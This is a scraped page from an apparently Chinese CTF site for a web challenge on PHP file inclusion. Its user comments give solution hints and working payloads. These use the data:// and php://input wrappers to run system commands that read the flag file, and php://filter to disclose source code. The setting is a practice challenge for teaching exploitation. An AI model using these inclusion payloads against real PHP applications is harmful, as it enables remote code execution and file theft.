简单的IncludeWEB 未解决

分数: 15 金币: 2
题目作者: hanzkj
一  血: flagOrz
一血奖励: 2金币
解  决: 173
提  示:
描  述:

听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。

...
登录回复
评论
网恋秀牛子被录屏导致自卑 29天前
举报

/?page=data://text/plain,<?=exec("cat /fla?")?>

回复 0
shrinp 1月前
举报

php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可

回复 0
yinghui130 2月前
举报

POST /?page=php://input HTTP/1.1 <br> Host: 171.80.2.169:15133 <br> <br> <?php system('tac /flag ');?>

回复 1
网恋秀牛子被录屏导致自卑 29天前
举报

@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了

回复 0
111222 1月前
举报

谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过

回复 0
Jazz888 2月前
举报

flag{**********}

回复 0
wywitkey 2月前
举报

解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag

回复 0

WriteUp

image
gxnb123

3 金币

立即查看

评分(0)

暂无评分

解题动态

言寺介 攻破了该题 1天前
AzKanna 攻破了该题 2天前
sunyq 攻破了该题 4天前
rf123 攻破了该题 5天前
1uxu4y 攻破了该题 6天前
luck1219 攻破了该题 8天前
陌兮li 攻破了该题 10天前
查无此人 攻破了该题 10天前
你好999你好 攻破了该题 11天前
nihaolmb 攻破了该题 12天前
tanjhysj0 攻破了该题 16天前
L4ne 攻破了该题 16天前
yuluo 攻破了该题 17天前
20230302203 攻破了该题 17天前
lotuswhite 攻破了该题 18天前
容大晋 攻破了该题 18天前
叶子璐 攻破了该题 18天前
刘德龙 攻破了该题 18天前
YTT 攻破了该题 18天前
黎悦依 攻破了该题 18天前
问题反馈